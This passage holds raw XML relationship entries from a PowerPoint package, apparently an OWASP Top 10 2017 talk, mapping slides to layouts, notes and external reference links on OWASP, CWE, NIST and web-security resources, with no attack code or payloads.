Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.html"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www.owasp.org/index.php/Access_Control_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Authorization" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#6:_Implement_Access_Controls" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools"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www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/388.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/16.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-123/final" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V19_Configuration" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmarks/"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www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00200308_clientsidetemplateinjection" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html"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speakerdeck.com/pwntester/friday-the-13th-json-attacks" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://frohoff.github.io/appseccali-marshalling-pickles/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/pwntester/surviving-the-java-deserialization-apocalypse" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mbechler/marshalsec" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/502.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#4:_Validate_All_Inputs" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Deserialization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/cschneider4711/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/research-presentations/the-unfortunate-reality-of-insecure-libraries" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubysec.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices#What_is_a_Virtual_Patch.3F" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Heartbleed" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/retirejs/retire.js/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/report/89bnfUyJ" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Map_Application_Architecture_(OTG-INFO-010)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Internet_of_things" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Dependency_Check" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mojohaus.org/versions-maven-plugin/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V1_Architecture" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/version-search.php"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www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#8:_Implement_Logging_and_Intrusion_Detection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&amp;" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/223.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Logging_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_AppSensor_Project"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www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education_Project" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Projects" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.NET" TargetMode="Externa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17.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS"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www.owasp.org/index.php/OWASP_Chapter" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/user/OWASPGLOBAL" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20.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notesSlide" Target="../notesSlides/notesSlide19.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Application_Security_Guide_For_CISOs" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors1.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21.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20.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.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tags" Target="../tags/tag20.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide22.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/451.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/918.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/400.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/829.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/799.html" TargetMode="Externa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hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.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tags" Target="../tags/tag23.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall/submissions"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hyperlink" Target="https://www.owasp.org/index.php/top10" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId7" 